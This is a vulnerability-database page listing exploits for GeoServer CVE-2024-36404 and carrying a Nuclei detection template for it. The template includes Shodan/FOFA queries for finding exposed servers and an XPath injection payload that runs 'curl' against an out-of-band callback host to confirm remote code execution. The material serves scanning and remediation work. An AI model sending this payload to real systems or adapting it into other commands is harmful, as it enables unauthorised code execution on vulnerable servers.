| Reporter | Title | Published | Views | Family All 72 |
|---|---|---|---|---|
| Geoserver Unauthenticated Remote Code Execution Exploit | 16 Jul 202400:00 | – | zdt | |
| Exploit for Code Injection in Geoserver | 1 Aug 202421:22 | – | githubexploit | |
| Exploit for Code Injection in Geoserver | 6 Jul 202401:10 | – | githubexploit | |
| Exploit for Code Injection in Geoserver | 5 Oct 202410:08 | – | githubexploit | |
| Exploit for Code Injection in Geoserver | 30 May 202609:44 | – | githubexploit | |
| Exploit for Code Injection in Geoserver | 4 Jul 202413:19 | – | githubexploit | |
| Exploit for Code Injection in Geoserver | 5 Jul 202415:24 | – | githubexploit | |
| Exploit for Code Injection in Geoserver | 14 Oct 202415:57 | – | githubexploit | |
| Exploit for Code Injection in Geoserver | 22 Nov 202403:57 | – | githubexploit | |
| Exploit for Code Injection in Geoserver | 30 Jul 202418:43 | – | githubexploit |
id: CVE-2024-36404
info:
name: GeoServer and GeoTools - Remote Code Execution
author: ritikchaddha,darses
severity: critical
description: |
GeoTools is an open source Java library that provides tools for geospatial data. Prior to versions 31.2, 30.4, and 29.6, Remote Code Execution (RCE) is possible if an application uses certain GeoTools functionality to evaluate XPath expressions supplied by user input. Versions 31.2, 30.4, and 29.6 contain a fix for this issue. As a workaround, GeoTools can operate with reduced functionality by removing the `gt-complex` jar from one's application. As an example of the impact, application schema `datastore` would not function without the ability to use XPath expressions to query complex content. Alternatively, one may utilize a drop-in replacement GeoTools jar from SourceForge for versions 31.1, 30.3, 30.2, 29.2, 28.2, 27.5, 27.4, 26.7, 26.4, 25.2, and 24.0. These jars are for download only and are not available from maven central, intended to quickly provide a fix to affected applications.
impact: |
Unauthenticated attackers can execute arbitrary code remotely via XPath expression exploitation in GeoTools functionality.
remediation: |
Update GeoServer and GeoTools to versions 31.2, 30.4, or 29.6 or later.
reference:
- https://nsfocusglobal.com/remote-code-execution-vulnerability-between-geoserver-and-geotools-cve-2024-36401-cve-2024-36404-notification/
- https://geoserver.org/vulnerability/2024/09/12/cve-2024-36401.html
- https://nvd.nist.gov/vuln/detail/CVE-2024-36404
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2024-36404
cwe-id: CWE-95
epss-score: 0.74908
epss-percentile: 0.99446
metadata:
verified: true
max-request: 8
vendor: osgeo
product: geoserver
shodan-query:
- title:"geoserver"
- 'http.html_hash:1093634893 "Content-Disposition: inline"'
- http.favicon.hash:97540678
- html:"/geoserver/"
fofa-query:
- title="geoserver"
- app="geoserver"
- icon_hash="97540678"
- body="/geoserver/"
tags: cve,cve2024,geoserver,rce,vuln
flow: http(1) && http(2)
http:
- method: GET
path:
- "{{BaseURL}}/geoserver/wfs?service=WFS&request=GetCapabilities"
- "{{BaseURL}}/geoserver/ows?service=WFS&request=GetCapabilities"
- "{{BaseURL}}/wfs?service=WFS&request=GetCapabilities"
- "{{BaseURL}}/ows?service=WFS&request=GetCapabilities"
stop-at-first-match: true
matchers:
- type: dsl
dsl:
- 'contains(body, "wfs:WFS_Capabilities")'
- 'contains(content_type, "application/xml")'
- "status_code == 200"
condition: and
internal: true
extractors:
- type: xpath
name: featuretype
internal: true
xpath:
- /wfs:WFS_Capabilities/FeatureTypeList/FeatureType[1]/Name
- method: POST
path:
- "{{BaseURL}}/geoserver/wfs?service=WFS"
- "{{BaseURL}}/geoserver/ows?service=WFS"
- "{{BaseURL}}/wfs?service=WFS"
- "{{BaseURL}}/ows?service=WFS"
headers:
Content-Type: application/xml
body: |
<wfs:GetPropertyValue service='WFS' version='2.0.0' xmlns:wfs='http://www.opengis.net/wfs/2.0'>
<wfs:Query typeNames='{{featuretype}}'/>
<wfs:valueReference>exec(java.lang.Runtime.getRuntime(),'curl {{interactsh-url}}')</wfs:valueReference>
</wfs:GetPropertyValue>
stop-at-first-match: true
matchers:
- type: dsl
dsl:
- 'contains(interactsh_protocol, "dns")'
- 'contains(body, "java.lang.ClassCastException")'
- 'contains(content_type, "application/xml")'
- "status_code == 400"
condition: and
# digest: 4b0a00483046022100e4de0f75de37d82db2b1e60b7256b97cf497b56812517891dad4e6059eb12b60022100b39f7c18cf69218f692572ff0b4d1c8b778e4c792bc9d974ae718e06a12f9ea1:922c64590222798bb761d5b6d8e72950Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation